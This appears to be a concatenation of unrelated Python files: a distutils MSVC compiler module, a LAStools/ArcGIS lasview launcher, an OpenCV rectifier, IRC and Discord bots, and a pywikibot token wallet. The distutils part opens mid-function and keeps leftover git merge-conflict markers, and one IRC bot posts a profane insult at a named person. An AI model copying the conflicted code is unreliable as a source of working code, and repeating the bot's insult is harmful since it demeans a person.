def _remove_visual_c_ref(self, manifest_file):
try:
# Remove references to the Visual C runtime, so they will
# fall through to the Visual C dependency of Python.exe.
# This way, when installed for a restricted user (e.g.
# runtimes are not in WinSxS folder, but in Python's own
# folder), the runtimes do not need to be in every folder
# with .pyd's.
# Returns either the filename of the modified manifest or
# None if no manifest should be embedded.
manifest_f = open(manifest_file)
try:
manifest_buf = manifest_f.read()
finally:
manifest_f.close()
pattern = re.compile(
r"""<assemblyIdentity.*?name=("|')Microsoft\."""\
r"""VC\d{2}\.CRT("|').*?(/>|</assemblyIdentity>)""",
re.DOTALL)
manifest_buf = re.sub(pattern, "", manifest_buf)
pattern = "<dependentAssembly>\s*</dependentAssembly>"
manifest_buf = re.sub(pattern, "", manifest_buf)
# Now see if any other assemblies are referenced - if not, we
# don't want a manifest embedded.
pattern = re.compile(
r"""<assemblyIdentity.*?name=(?:"|')(.+?)(?:"|')"""
r""".*?(?:/>|</assemblyIdentity>)""", re.DOTALL)
if re.search(pattern, manifest_buf) is None:
return None
manifest_f = open(manifest_file, 'w')
try:
manifest_f.write(manifest_buf)
return manifest_file
finally:
manifest_f.close()
except OSError:
pass
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "/LIBPATH:" + dir
def runtime_library_dir_option(self, dir):
raise DistutilsPlatformError(
"don't know how to set runtime library search path for MSVC++")
def library_option(self, lib):
return self.library_filename(lib)
def find_library_file(self, dirs, lib, debug=0):
# Prefer a debugging library if found (and requested), but deal
# with it if we don't have one.
if debug:
try_names = [lib + "_d", lib]
else:
try_names = [lib]
for dir in dirs:
for name in try_names:
libfile = os.path.join(dir, self.library_filename (name))
if os.path.exists(libfile):
return libfile
else:
# Oops, didn't find it in *any* of 'dirs'
return None
# Helper methods for using the MSVC registry settings
def find_exe(self, exe):
"""Return path to an MSVC executable program.
Tries to find the program in several places: first, one of the
MSVC program search paths from the registry; next, the directories
in the PATH environment variable. If any of those work, return an
absolute path that is known to exist. If none of them work, just
return the original program name, 'exe'.
"""
for p in self.__paths:
fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
# didn't find it; try existing path
for p in os.environ['Path'].split(';'):
fn = os.path.join(os.path.abspath(p),exe)
if os.path.isfile(fn):
return fn
return exe
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
=======
"""distutils.msvc9compiler
Contains MSVCCompiler, an implementation of the abstract CCompiler class
for the Microsoft Visual Studio 2008.
The module is compatible with VS 2005 and VS 2008. You can find legacy support
for older versions of VS in distutils.msvccompiler.
"""
import os
import subprocess
import sys
import re
from distutils.errors import DistutilsExecError, DistutilsPlatformError, \
CompileError, LibError, LinkError
from distutils.ccompiler import CCompiler, gen_preprocess_options, \
gen_lib_options
from distutils import log
from distutils.util import get_platform
import winreg
RegOpenKeyEx = winreg.OpenKeyEx
RegEnumKey = winreg.EnumKey
RegEnumValue = winreg.EnumValue
RegError = winreg.error
HKEYS = (winreg.HKEY_USERS,
winreg.HKEY_CURRENT_USER,
winreg.HKEY_LOCAL_MACHINE,
winreg.HKEY_CLASSES_ROOT)
NATIVE_WIN64 = (sys.platform == 'win32' and sys.maxsize > 2**32)
if NATIVE_WIN64:
# Visual C++ is a 32-bit application, so we need to look in
# the corresponding registry branch, if we're running a
# 64-bit Python on Win64
VS_BASE = r"Software\Wow6432Node\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Wow6432Node\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Wow6432Node\Microsoft\.NETFramework"
else:
VS_BASE = r"Software\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Microsoft\.NETFramework"
PLAT_TO_VCVARS = {
'win32' : 'x86',
'win-amd64' : 'amd64',
'win-ia64' : 'ia64',
}
class Reg:
"""Helper class to read values from the registry
"""
def get_value(cls, path, key):
for base in HKEYS:
d = cls.read_values(base, path)
if d and key in d:
return d[key]
raise KeyError(key)
get_value = classmethod(get_value)
def read_keys(cls, base, key):
"""Return list of registry keys."""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
L = []
i = 0
while True:
try:
k = RegEnumKey(handle, i)
except RegError:
break
L.append(k)
i += 1
return L
read_keys = classmethod(read_keys)
def read_values(cls, base, key):
"""Return dict of registry keys and values.
All names are converted to lowercase.
"""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
name, value, type = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[cls.convert_mbcs(name)] = cls.convert_mbcs(value)
i += 1
return d
read_values = classmethod(read_values)
def convert_mbcs(s):
dec = getattr(s, "decode", None)
if dec is not None:
try:
s = dec("mbcs")
except UnicodeError:
pass
return s
convert_mbcs = staticmethod(convert_mbcs)
class MacroExpander:
def __init__(self, version):
self.macros = {}
self.vsbase = VS_BASE % version
self.load_macros(version)
def set_macro(self, macro, path, key):
self.macros["$(%s)" % macro] = Reg.get_value(path, key)
def load_macros(self, version):
self.set_macro("VCInstallDir", self.vsbase + r"\Setup\VC", "productdir")
self.set_macro("VSInstallDir", self.vsbase + r"\Setup\VS", "productdir")
self.set_macro("FrameworkDir", NET_BASE, "installroot")
try:
if version >= 8.0:
self.set_macro("FrameworkSDKDir", NET_BASE,
"sdkinstallrootv2.0")
else:
raise KeyError("sdkinstallrootv2.0")
except KeyError:
raise DistutilsPlatformError(
"""Python was built with Visual Studio 2008;
extensions must be built with a compiler than can generate compatible binaries.
Visual Studio 2008 was not found on this system. If you have Cygwin installed,
you can try compiling with MingW32, by passing "-c mingw32" to setup.py.""")
if version >= 9.0:
self.set_macro("FrameworkVersion", self.vsbase, "clr version")
self.set_macro("WindowsSdkDir", WINSDK_BASE, "currentinstallfolder")
else:
p = r"Software\Microsoft\NET Framework Setup\Product"
for base in HKEYS:
try:
h = RegOpenKeyEx(base, p)
except RegError:
continue
key = RegEnumKey(h, 0)
d = Reg.get_value(base, r"%s\%s" % (p, key))
self.macros["$(FrameworkVersion)"] = d["version"]
def sub(self, s):
for k, v in self.macros.items():
s = s.replace(k, v)
return s
def get_build_version():
"""Return the version of MSVC that was used to build Python.
For Python 2.3 and up, the version number is included in
sys.version. For earlier versions, assume the compiler is MSVC 6.
"""
prefix = "MSC v."
i = sys.version.find(prefix)
if i == -1:
return 6
i = i + len(prefix)
s, rest = sys.version[i:].split(" ", 1)
majorVersion = int(s[:-2]) - 6
minorVersion = int(s[2:3]) / 10.0
# I don't think paths are affected by minor version in version 6
if majorVersion == 6:
minorVersion = 0
if majorVersion >= 6:
return majorVersion + minorVersion
# else we don't know what version of the compiler this is
return None
def normalize_and_reduce_paths(paths):
"""Return a list of normalized paths with duplicates removed.
The current order of paths is maintained.
"""
# Paths are normalized so things like: /a and /a/ aren't both preserved.
reduced_paths = []
for p in paths:
np = os.path.normpath(p)
# XXX(nnorwitz): O(n**2), if reduced_paths gets long perhaps use a set.
if np not in reduced_paths:
reduced_paths.append(np)
return reduced_paths
def removeDuplicates(variable):
"""Remove duplicate values of an environment variable.
"""
oldList = variable.split(os.pathsep)
newList = []
for i in oldList:
if i not in newList:
newList.append(i)
newVariable = os.pathsep.join(newList)
return newVariable
def find_vcvarsall(version):
"""Find the vcvarsall.bat file
At first it tries to find the productdir of VS 2008 in the registry. If
that fails it falls back to the VS90COMNTOOLS env var.
"""
vsbase = VS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
log.debug("Unable to find productdir in registry")
productdir = None
if not productdir or not os.path.isdir(productdir):
toolskey = "VS%0.f0COMNTOOLS" % version
toolsdir = os.environ.get(toolskey, None)
if toolsdir and os.path.isdir(toolsdir):
productdir = os.path.join(toolsdir, os.pardir, os.pardir, "VC")
productdir = os.path.abspath(productdir)
if not os.path.isdir(productdir):
log.debug("%s is not a valid directory" % productdir)
return None
else:
log.debug("Env var %s is not set or invalid" % toolskey)
if not productdir:
log.debug("No productdir found")
return None
vcvarsall = os.path.join(productdir, "vcvarsall.bat")
if os.path.isfile(vcvarsall):
return vcvarsall
log.debug("Unable to find vcvarsall.bat")
return None
def query_vcvarsall(version, arch="x86"):
"""Launch vcvarsall.bat and read the settings from its environment
"""
vcvarsall = find_vcvarsall(version)
interesting = set(("include", "lib", "libpath", "path"))
result = {}
if vcvarsall is None:
raise DistutilsPlatformError("Unable to find vcvarsall.bat")
log.debug("Calling 'vcvarsall.bat %s' (version=%s)", arch, version)
popen = subprocess.Popen('"%s" %s & set' % (vcvarsall, arch),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stdout, stderr = popen.communicate()
if popen.wait() != 0:
raise DistutilsPlatformError(stderr.decode("mbcs"))
stdout = stdout.decode("mbcs")
for line in stdout.split("\n"):
line = Reg.convert_mbcs(line)
if '=' not in line:
continue
line = line.strip()
key, value = line.split('=', 1)
key = key.lower()
if key in interesting:
if value.endswith(os.pathsep):
value = value[:-1]
result[key] = removeDuplicates(value)
finally:
popen.stdout.close()
popen.stderr.close()
if len(result) != len(interesting):
raise ValueError(str(list(result.keys())))
return result
VERSION = get_build_version()
if VERSION < 8.0:
raise DistutilsPlatformError("VC %0.1f is not supported by this module" % VERSION)
class MSVCCompiler(CCompiler) :
"""Concrete class that implements an interface to Microsoft Visual C++,
as defined by the CCompiler abstract class."""
compiler_type = 'msvc'
# Just set this so CCompiler's constructor doesn't barf. We currently
# don't use the 'set_executables()' bureaucracy provided by CCompiler,
# as it really isn't necessary for this sort of single-compiler class.
# Would be nice to have a consistent interface with UnixCCompiler,
# though, so it's worth thinking about.
executables = {}
# Private class data (need to distinguish C from C++ source for compiler)
_c_extensions = ['.c']
_cpp_extensions = ['.cc', '.cpp', '.cxx']
_rc_extensions = ['.rc']
_mc_extensions = ['.mc']
# Needed for the filename generation methods provided by the
# base class, CCompiler.
src_extensions = (_c_extensions + _cpp_extensions +
_rc_extensions + _mc_extensions)
res_extension = '.res'
obj_extension = '.obj'
static_lib_extension = '.lib'
shared_lib_extension = '.dll'
static_lib_format = shared_lib_format = '%s%s'
exe_extension = '.exe'
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__ (self, verbose, dry_run, force)
self.__version = VERSION
self.__root = r"Software\Microsoft\VisualStudio"
# self.__macros = MACROS
self.__paths = []
# target platform (.plat_name is consistent with 'bdist')
self.plat_name = None
self.__arch = None # deprecated name
self.initialized = False
def initialize(self, plat_name=None):
# multi-init means we would need to check platform same each time...
assert not self.initialized, "don't init multiple times"
if plat_name is None:
plat_name = get_platform()
# sanity check for platforms to prevent obscure errors later.
ok_plats = 'win32', 'win-amd64', 'win-ia64'
if plat_name not in ok_plats:
raise DistutilsPlatformError("--plat-name must be one of %s" %
(ok_plats,))
if "DISTUTILS_USE_SDK" in os.environ and "MSSdk" in os.environ and self.find_exe("cl.exe"):
# Assume that the SDK set up everything alright; don't try to be
# smarter
self.cc = "cl.exe"
self.linker = "link.exe"
self.lib = "lib.exe"
self.rc = "rc.exe"
self.mc = "mc.exe"
else:
# On x86, 'vcvars32.bat amd64' creates an env that doesn't work;
# to cross compile, you use 'x86_amd64'.
# On AMD64, 'vcvars32.bat amd64' is a native build env; to cross
# compile use 'x86' (ie, it runs the x86 compiler directly)
# No idea how itanium handles this, if at all.
if plat_name == get_platform() or plat_name == 'win32':
# native build or cross-compile to win32
plat_spec = PLAT_TO_VCVARS[plat_name]
else:
# cross compile from win32 -> some 64bit
plat_spec = PLAT_TO_VCVARS[get_platform()] + '_' + \
PLAT_TO_VCVARS[plat_name]
vc_env = query_vcvarsall(VERSION, plat_spec)
self.__paths = vc_env['path'].split(os.pathsep)
os.environ['lib'] = vc_env['lib']
os.environ['include'] = vc_env['include']
if len(self.__paths) == 0:
raise DistutilsPlatformError("Python was built with %s, "
"and extensions need to be built with the same "
"version of the compiler, but it isn't installed."
% self.__product)
self.cc = self.find_exe("cl.exe")
self.linker = self.find_exe("link.exe")
self.lib = self.find_exe("lib.exe")
self.rc = self.find_exe("rc.exe") # resource compiler
self.mc = self.find_exe("mc.exe") # message compiler
#self.set_path_env_var('lib')
#self.set_path_env_var('include')
# extend the MSVC path with the current path
try:
for p in os.environ['path'].split(';'):
self.__paths.append(p)
except KeyError:
pass
self.__paths = normalize_and_reduce_paths(self.__paths)
os.environ['path'] = ";".join(self.__paths)
self.preprocess_options = None
if self.__arch == "x86":
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3',
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3',
'/Z7', '/D_DEBUG']
else:
# Win64
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3', '/GS-' ,
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3', '/GS-',
'/Z7', '/D_DEBUG']
self.ldflags_shared = ['/DLL', '/nologo', '/INCREMENTAL:NO']
if self.__version >= 7:
self.ldflags_shared_debug = [
'/DLL', '/nologo', '/INCREMENTAL:no', '/DEBUG', '/pdb:None'
]
self.ldflags_static = [ '/nologo']
self.initialized = True
# -- Worker methods ------------------------------------------------
def object_filenames(self,
source_filenames,
strip_dir=0,
output_dir=''):
# Copied from ccompiler.py, extended to return .res as 'object'-file
# for .rc input file
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
(base, ext) = os.path.splitext (src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
# Better to raise an exception instead of silently continuing
# and later complain about sources and targets having
# different lengths
raise CompileError ("Don't know how to compile %s" % src_name)
if strip_dir:
base = os.path.basename (base)
if ext in self._rc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
elif ext in self._mc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
def compile(self, sources,
output_dir=None, macros=None, include_dirs=None, debug=0,
extra_preargs=None, extra_postargs=None, depends=None):
if not self.initialized:
self.initialize()
compile_info = self._setup_compile(output_dir, macros, include_dirs,
sources, depends, extra_postargs)
macros, objects, extra_postargs, pp_opts, build = compile_info
compile_opts = extra_preargs or []
compile_opts.append ('/c')
if debug:
compile_opts.extend(self.compile_options_debug)
else:
compile_opts.extend(self.compile_options)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
if debug:
# pass the full pathname to MSVC in debug mode,
# this allows the debugger to find the source file
# without asking the user to browse for it
src = os.path.abspath(src)
if ext in self._c_extensions:
input_opt = "/Tc" + src
elif ext in self._cpp_extensions:
input_opt = "/Tp" + src
elif ext in self._rc_extensions:
# compile .RC to .RES file
input_opt = src
output_opt = "/fo" + obj
try:
self.spawn([self.rc] + pp_opts +
[output_opt] + [input_opt])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
elif ext in self._mc_extensions:
# Compile .MC to .RC file to .RES file.
# * '-h dir' specifies the directory for the
# generated include file
# * '-r dir' specifies the target directory of the
# generated RC file and the binary message resource
# it includes
#
# For now (since there are no options to change this),
# we use the source-directory for the include file and
# the build directory for the RC file and message
# resources. This works at least for win32all.
h_dir = os.path.dirname(src)
rc_dir = os.path.dirname(obj)
try:
# first compile .MC to .RC and .H file
self.spawn([self.mc] +
['-h', h_dir, '-r', rc_dir] + [src])
base, _ = os.path.splitext (os.path.basename (src))
rc_file = os.path.join (rc_dir, base + '.rc')
# then compile .RC to .RES file
self.spawn([self.rc] +
["/fo" + obj] + [rc_file])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
else:
# how to handle this file?
raise CompileError("Don't know how to compile %s to %s"
% (src, obj))
output_opt = "/Fo" + obj
try:
self.spawn([self.cc] + compile_opts + pp_opts +
[input_opt, output_opt] +
extra_postargs)
except DistutilsExecError as msg:
raise CompileError(msg)
return objects
def create_static_lib(self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
output_filename = self.library_filename(output_libname,
output_dir=output_dir)
if self._need_link(objects, output_filename):
lib_args = objects + ['/OUT:' + output_filename]
if debug:
pass # XXX what goes here?
try:
self.spawn([self.lib] + lib_args)
except DistutilsExecError as msg:
raise LibError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
fixed_args = self._fix_lib_args(libraries, library_dirs,
runtime_library_dirs)
(libraries, library_dirs, runtime_library_dirs) = fixed_args
if runtime_library_dirs:
self.warn ("I don't know what to do with 'runtime_library_dirs': "
+ str (runtime_library_dirs))
lib_opts = gen_lib_options(self,
library_dirs, runtime_library_dirs,
libraries)
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
if target_desc == CCompiler.EXECUTABLE:
if debug:
ldflags = self.ldflags_shared_debug[1:]
else:
ldflags = self.ldflags_shared[1:]
else:
if debug:
ldflags = self.ldflags_shared_debug
else:
ldflags = self.ldflags_shared
export_opts = []
for sym in (export_symbols or []):
export_opts.append("/EXPORT:" + sym)
ld_args = (ldflags + lib_opts + export_opts +
objects + ['/OUT:' + output_filename])
# The MSVC linker generates .lib and .exp files, which cannot be
# suppressed by any linker switches. The .lib files may even be
# needed! Make sure they are generated in the temporary build
# directory. Since they have different names for debug and release
# builds, they can go into the same directory.
build_temp = os.path.dirname(objects[0])
if export_symbols is not None:
(dll_name, dll_ext) = os.path.splitext(
os.path.basename(output_filename))
implib_file = os.path.join(
build_temp,
self.library_filename(dll_name))
ld_args.append ('/IMPLIB:' + implib_file)
self.manifest_setup_ldargs(output_filename, build_temp, ld_args)
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
self.spawn([self.linker] + ld_args)
except DistutilsExecError as msg:
raise LinkError(msg)
# embed the manifest
# XXX - this is somewhat fragile - if mt.exe fails, distutils
# will still consider the DLL up-to-date, but it will not have a
# manifest. Maybe we should link to a temp file? OTOH, that
# implies a build environment error that shouldn't go undetected.
mfinfo = self.manifest_get_embed_info(target_desc, ld_args)
if mfinfo is not None:
mffilename, mfid = mfinfo
out_arg = '-outputresource:%s;%s' % (output_filename, mfid)
try:
self.spawn(['mt.exe', '-nologo', '-manifest',
mffilename, out_arg])
except DistutilsExecError as msg:
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def manifest_setup_ldargs(self, output_filename, build_temp, ld_args):
# If we need a manifest at all, an embedded manifest is recommended.
# See MSDN article titled
# "How to: Embed a Manifest Inside a C/C++ Application"
# (currently at http://msdn2.microsoft.com/en-us/library/ms235591(VS.80).aspx)
# Ask the linker to generate the manifest in the temp dir, so
# we can check it, and possibly embed it, later.
temp_manifest = os.path.join(
build_temp,
os.path.basename(output_filename) + ".manifest")
ld_args.append('/MANIFESTFILE:' + temp_manifest)
def manifest_get_embed_info(self, target_desc, ld_args):
# If a manifest should be embedded, return a tuple of
# (manifest_filename, resource_id). Returns None if no manifest
# should be embedded. See http://bugs.python.org/issue7833 for why
# we want to avoid any manifest for extension modules if we can)
for arg in ld_args:
if arg.startswith("/MANIFESTFILE:"):
temp_manifest = arg.split(":", 1)[1]
break
else:
# no /MANIFESTFILE so nothing to do.
return None
if target_desc == CCompiler.EXECUTABLE:
# by default, executables always get the manifest with the
# CRT referenced.
mfid = 1
else:
# Extension modules try and avoid any manifest if possible.
mfid = 2
temp_manifest = self._remove_visual_c_ref(temp_manifest)
if temp_manifest is None:
return None
return temp_manifest, mfid
def _remove_visual_c_ref(self, manifest_file):
try:
# Remove references to the Visual C runtime, so they will
# fall through to the Visual C dependency of Python.exe.
# This way, when installed for a restricted user (e.g.
# runtimes are not in WinSxS folder, but in Python's own
# folder), the runtimes do not need to be in every folder
# with .pyd's.
# Returns either the filename of the modified manifest or
# None if no manifest should be embedded.
manifest_f = open(manifest_file)
try:
manifest_buf = manifest_f.read()
finally:
manifest_f.close()
pattern = re.compile(
r"""<assemblyIdentity.*?name=("|')Microsoft\."""\
r"""VC\d{2}\.CRT("|').*?(/>|</assemblyIdentity>)""",
re.DOTALL)
manifest_buf = re.sub(pattern, "", manifest_buf)
pattern = "<dependentAssembly>\s*</dependentAssembly>"
manifest_buf = re.sub(pattern, "", manifest_buf)
# Now see if any other assemblies are referenced - if not, we
# don't want a manifest embedded.
pattern = re.compile(
r"""<assemblyIdentity.*?name=(?:"|')(.+?)(?:"|')"""
r""".*?(?:/>|</assemblyIdentity>)""", re.DOTALL)
if re.search(pattern, manifest_buf) is None:
return None
manifest_f = open(manifest_file, 'w')
try:
manifest_f.write(manifest_buf)
return manifest_file
finally:
manifest_f.close()
except OSError:
pass
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "/LIBPATH:" + dir
def runtime_library_dir_option(self, dir):
raise DistutilsPlatformError(
"don't know how to set runtime library search path for MSVC++")
def library_option(self, lib):
return self.library_filename(lib)
def find_library_file(self, dirs, lib, debug=0):
# Prefer a debugging library if found (and requested), but deal
# with it if we don't have one.
if debug:
try_names = [lib + "_d", lib]
else:
try_names = [lib]
for dir in dirs:
for name in try_names:
libfile = os.path.join(dir, self.library_filename (name))
if os.path.exists(libfile):
return libfile
else:
# Oops, didn't find it in *any* of 'dirs'
return None
# Helper methods for using the MSVC registry settings
def find_exe(self, exe):
"""Return path to an MSVC executable program.
Tries to find the program in several places: first, one of the
MSVC program search paths from the registry; next, the directories
in the PATH environment variable. If any of those work, return an
absolute path that is known to exist. If none of them work, just
return the original program name, 'exe'.
"""
for p in self.__paths:
fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
# didn't find it; try existing path
for p in os.environ['Path'].split(';'):
            fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
return exe
|
import sys, os, arcgisscripting, subprocess
def check_output(command,console):
if console == True:
process = subprocess.Popen(command)
else:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
output,error = process.communicate()
returncode = process.poll()
return returncode,output
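# Hedged usage sketch (illustrative only; the command below is an assumption,
# not part of this script): with console=False the call captures combined
# stdout/stderr text, e.g.
#   rc, out = check_output("dir", False)
# whereas console=True inherits the parent console and captures no output.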
gp = arcgisscripting.create(9.3)
gp.AddMessage("Starting lasview ...")
argc = len(sys.argv)
lastools_path = os.path.dirname(os.path.dirname(os.path.dirname(sys.argv[0])))
if lastools_path.count(" ") > 0:
gp.AddMessage("Error. Path to .\\lastools installation contains spaces.")
gp.AddMessage("This does not work: " + lastools_path)
gp.AddMessage("This would work: C:\\software\\lastools")
sys.exit(1)
lastools_path = lastools_path + "\\bin"
if os.path.exists(lastools_path) == False:
gp.AddMessage("Cannot find .\\lastools\\bin at " + lastools_path)
sys.exit(1)
else:
gp.AddMessage("Found " + lastools_path + " ...")
lasview_path = lastools_path+"\\lasview.exe"
if os.path.exists(lasview_path) == False:
gp.AddMessage("Cannot find lasview.exe at " + lasview_path)
sys.exit(1)
else:
gp.AddMessage("Found " + lasview_path + " ...")
command = ['"'+lasview_path+'"']
if sys.argv[argc-1] == "true":
command.append("-v")
command.append("-i")
command.append('"'+sys.argv[1]+'"')
if sys.argv[2] != "5000000":
command.append("-points")
command.append(sys.argv[2])
if sys.argv[3] == "first returns":
command.append("-only_first")
elif sys.argv[3] == "last returns":
command.append("-only_last")
elif sys.argv[3] == "multi returns":
command.append("-only_multi")
elif sys.argv[3] == "single returns":
command.append("-only_single")
elif sys.argv[3] == "ground":
command.append("-ground")
elif sys.argv[3] == "buildings":
command.append("-buildings")
elif sys.argv[3] == "vegetation":
command.append("-vegetation")
elif sys.argv[3] == "objects":
command.append("-objects")
elif sys.argv[3] == "ground and buildings":
command.append("-ground_buildings")
elif sys.argv[3] == "ground and vegetation":
command.append("-ground_vegetation")
elif sys.argv[3] == "ground and objects":
command.append("-ground_objects")
if sys.argv[4] == "elevation ramp 1":
command.append("-color_by_elevation1")
elif sys.argv[4] == "elevation ramp 2":
command.append("-color_by_elevation2")
elif sys.argv[4] == "classification":
command.append("-color_by_classification")
elif sys.argv[4] == "rgb":
command.append("-color_by_rgb")
elif sys.argv[4] == "flight line":
command.append("-color_by_flight_line")
elif sys.argv[4] == "intensity":
command.append("-color_by_intensity")
elif sys.argv[4] == "number returns":
command.append("-color_by_returns")
if sys.argv[5] != "#":
command.append("-cp")
command.append('"'+sys.argv[5]+'"')
if sys.argv[6] != "#":
command.append("-cp_parse")
command.append(sys.argv[6])
if sys.argv[7] != "#":
additional_options = sys.argv[7].split()
for option in additional_options:
command.append(option)
gp.AddMessage("LAStools command line:")
command_length = len(command)
command_string = str(command[0])
command[0] = command[0].strip('"')
for i in range(1, command_length):
command_string = command_string + " " + str(command[i])
command[i] = command[i].strip('"')
gp.AddMessage(command_string)
returncode,output = check_output(command, False)
gp.AddMessage(str(output))
if returncode != 0:
gp.AddMessage("Error. lasview failed.")
sys.exit(1)
gp.AddMessage("Success. lasview done.")
|
import cv2
import pickle
class Rectify:
def __init__(self, path=None):
if not path:
path = "calibrate.pkl"
        # Load the calibration maps and close the file promptly.
        with open(path, "rb") as f:
            self.cdata = pickle.load(f)
def rectify(self, img):
return cv2.remap(img, self.cdata['mapx'], self.cdata['mapy'], cv2.INTER_LINEAR)
if __name__ == "__main__":
r = Rectify()
src = cv2.imread("capture-gray.png")
dst = r.rectify(src)
cv2.imwrite("rectify-gray.png", dst)
src = cv2.imread("capture-color.png")
dst = r.rectify(src)
cv2.imwrite("rectify-color.png", dst)
cv2.imshow('color', dst)
cv2.waitKey(0)
cv2.destroyAllWindows()
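# Hedged note: calibrate.pkl is assumed to hold the 'mapx'/'mapy' arrays that
# a separate calibration step produced (e.g. via cv2.initUndistortRectifyMap);
# this script only consumes them.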
|
from sopel import *
@module.rule('.*[Aa][Ll][Pp][Ii][Nn][Ee].*')
def alpine(bot, trigger):
bot.say('FUCK TAD')
|
from discord import Client
from discord.errors import Forbidden
from moneybot import config
from moneybot.command import get_command
from moneybot.exc import InvalidCommand, MoneybotException
from moneybot.ledger import update_balance, get_user_balance, transfer_balance
import discord
client = Client()
def get_contents(message):
if message.content.startswith("$"):
return message.content.strip("$").strip()
if message.content.startswith("<@"):
mentions = message.mentions
if not mentions:
return False
mention_id = message.mentions[0].id
me = message.server.me.id
template = "<@{}>".format(me)
if message.content.startswith(template):
return message.content.replace(template, "").strip()
return False
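# Hedged examples of what get_contents returns (the bot user id 42 below is a
# made-up value for illustration):
#   "$balance"          -> "balance"      (dollar-prefixed command)
#   "<@42> tip @bob 5"  -> "tip @bob 5"   (message that mentions the bot first)
#   "hello there"       -> falsy          (no command detected)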
async def process_message(message):
if message.server is None:
return
author = message.author.id
server = message.server.id
contents = get_contents(message)
if contents:
tokens = contents.split()
Command = get_command(tokens[0])
if Command is not None:
command = Command(client, message, contents, tokens)
response = await command.perform()
if response:
await client.send_message(message.channel, response)
@client.event
async def on_message(message):
try:
await process_message(message)
except MoneybotException as e:
if e.args and e.public:
await client.send_message(message.channel, e.args[0])
else:
raise
except NotImplementedError:
await client.send_message(message.channel, "Not implemented yet!")
except Forbidden as e:
if e.code == 50013:
err = "Beep! Beep! I do not have permission to do that!"
await client.send_message(message.channel, err)
except Exception:
err = "Beep! Beep! You broke the bank. I hope you're satisfied."
await client.send_message(message.channel, err)
raise
def connect_to_discord():
client.run(config.DISCORD_TOKEN)
|
"""Objects representing api tokens."""
from pywikibot import debug
from pywikibot.exceptions import Error
_logger = 'site.tokenwallet'
class TokenWallet:
"""Container for tokens."""
def __init__(self, site) -> None:
"""Initializer.
:type site: pywikibot.site.APISite
"""
self.site = site
self._tokens = {}
self.failed_cache = set() # cache unavailable tokens.
def load_tokens(self, types, all: bool = False) -> None:
"""
Preload one or multiple tokens.
:param types: the types of token.
:type types: iterable
:param all: load all available tokens, if None only if it can be done
in one request.
"""
if self.site.user() is None:
self.site.login()
self._tokens.setdefault(self.site.user(), {}).update(
self.site.get_tokens(types, all=all))
# Preload all only the first time.
# When all=True types is extended in site.get_tokens().
        # Keys not recognised as tokens are cached so they are not requested
# any longer.
if all is not False:
for key in types:
if key not in self._tokens[self.site.user()]:
self.failed_cache.add((self.site.user(), key))
def __getitem__(self, key):
"""Get token value for the given key."""
if self.site.user() is None:
self.site.login()
user_tokens = self._tokens.setdefault(self.site.user(), {})
# always preload all for users without tokens
failed_cache_key = (self.site.user(), key)
# redirect old tokens to be compatible with older MW version
# https://www.mediawiki.org/wiki/MediaWiki_1.37/Deprecation_of_legacy_API_token_parameters
if self.site.mw_version >= '1.24wmf19' \
and key in {'edit', 'delete', 'protect', 'move', 'block', 'unblock',
'email', 'import', 'options'}:
debug(
'Token {!r} was replaced by {!r}'.format(key, 'csrf'), _logger)
key = 'csrf'
try:
key = self.site.validate_tokens([key])[0]
except IndexError:
raise Error(
"Requested token '{}' is invalid on {} wiki."
.format(key, self.site))
if (key not in user_tokens
and failed_cache_key not in self.failed_cache):
self.load_tokens([key], all=False if user_tokens else None)
if key in user_tokens:
return user_tokens[key]
# token not allowed for self.site.user() on self.site
self.failed_cache.add(failed_cache_key)
# to be changed back to a plain KeyError?
raise Error(
"Action '{}' is not allowed for user {} on {} wiki."
.format(key, self.site.user(), self.site))
